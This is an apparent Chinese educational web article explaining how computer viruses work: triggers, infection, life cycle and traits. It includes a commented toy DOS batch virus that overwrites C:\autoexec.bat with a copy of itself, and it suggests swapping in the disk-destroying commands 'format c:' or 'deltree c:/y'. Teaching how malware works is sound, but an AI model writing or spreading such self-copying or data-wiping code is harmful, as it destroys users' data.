計(jì)算機(jī)病毒工作原理
計(jì)算機(jī)病毒工作原理
計(jì)算機(jī)病毒的工作原理是怎么樣的呢?你了解過(guò)沒(méi)有!下面由學(xué)習(xí)啦小編給你做出詳細(xì)的計(jì)算機(jī)病毒工作原理介紹!希望對(duì)你有幫助!
計(jì)算機(jī)病毒工作原理介紹一:
計(jì)算機(jī)病毒一、工作原理:
病毒依附存儲(chǔ)介質(zhì)軟盤、 硬盤等構(gòu)成傳染源。病毒傳染的媒介由工作的環(huán)境來(lái)定。病毒激活是將病毒放在內(nèi)存,并設(shè)置觸發(fā)條件,觸發(fā)的條件是多樣化的
可以是時(shí)鐘,系統(tǒng)的日期,用戶標(biāo)識(shí)符,也可以是系統(tǒng)一次通信等。條件成熟病毒就開(kāi)始自我復(fù)制到傳染對(duì)象中,進(jìn)行各種破壞活動(dòng)等。
病毒的傳染是病毒性能的一個(gè)重要標(biāo)志。在傳染環(huán)節(jié)中,病毒復(fù)制一個(gè)自身副本到傳染對(duì)象中去。
計(jì)算機(jī)病毒二、計(jì)算機(jī)病毒的簡(jiǎn)單介紹:
計(jì)算機(jī)病毒(Computer Virus)是編制者在計(jì)算機(jī)程序中插入的破壞計(jì)算機(jī)功能或者數(shù)據(jù)的代碼,能影響計(jì)算機(jī)使用,能自我復(fù)制的一組計(jì)算機(jī)指令或者程序代碼。
計(jì)算機(jī)病毒具有傳播性、隱蔽性、感染性、潛伏性、可激發(fā)性、表現(xiàn)性或破壞性。計(jì)算機(jī)病毒的生命周期:開(kāi)發(fā)期→傳染期→潛伏期→發(fā)作期→發(fā)現(xiàn)期→消化期→消亡期。
計(jì)算機(jī)病毒是一個(gè)程序,一段可執(zhí)行碼。就像生物病毒一樣,具有自我繁殖、互相傳染以及激活再生等生物病毒特征。計(jì)算機(jī)病毒有獨(dú)特的復(fù)制能力,它們能夠快速蔓延,又常常難以根除。
它們能把自身附著在各種類型的文件上,當(dāng)文件被復(fù)制或從一個(gè)用戶傳送到另一個(gè)用戶時(shí),它們就隨同文件一起蔓延開(kāi)來(lái)。
計(jì)算機(jī)病毒工作原理介紹二:
計(jì)算機(jī)病毒是指編制或者在計(jì)算機(jī)程序中插入的破壞計(jì)算機(jī)功能或者破壞數(shù)據(jù),影響計(jì)算機(jī)使用并且能夠自我復(fù)制的一組計(jì)算機(jī)指令或者程序代碼。
舉一個(gè)“hello word”例子。
下面是一個(gè)簡(jiǎn)單的DOS批處理病毒源程序autoexec.bat(假設(shè)從A盤啟動(dòng)):程序語(yǔ)句 程序注解
IF exist c:\autoexec.bat goto Virus REM 首先檢查時(shí)機(jī)
Goto No_Virus REM 若時(shí)機(jī)不成熟則潛伏
:Virus REM 時(shí)機(jī)成熟時(shí)(子程序)
c: REM 轉(zhuǎn)到C盤
ren autoexec.bat auto.bat REM 將正常文件改名,準(zhǔn)備冒名頂替
copy a:\autoexec.bat c:\ REM 自我復(fù)制,開(kāi)始繁殖
echo Hello Word! REM 病毒發(fā)作,表現(xiàn)癥狀
:No_Virus REM 正常程序入口
a: REM 轉(zhuǎn)回A盤
/auto REM 執(zhí)行正常程序
pause REM 暫停等待按任意鍵繼續(xù)
這個(gè)程序非常簡(jiǎn)單,但卻包含了計(jì)算機(jī)病毒的典型結(jié)構(gòu),引導(dǎo)部分、傳染部分、激發(fā)部分等五臟俱全。其觸發(fā)機(jī)制是:C盤存在autoexec.bat文件,當(dāng)我們用帶有此病毒的啟動(dòng)軟盤啟動(dòng)微機(jī)時(shí)
若C盤也有autoexec.bat文件,則病毒將C盤原autoexec.bat文件改名為auto.bat,把自身復(fù)制到C盤并顯示“Hello Word!”。如果按以前的分類,它可以算是個(gè)良性病毒(但再良的病毒都要占用系統(tǒng)資源)。
當(dāng)然它還無(wú)加密和沒(méi)有嚴(yán)重破壞系統(tǒng)的行為,但要是把echo Hello Word!改為format c:或deltree c:/y
看了“ 計(jì)算機(jī)病毒工作原理”文章的還看了: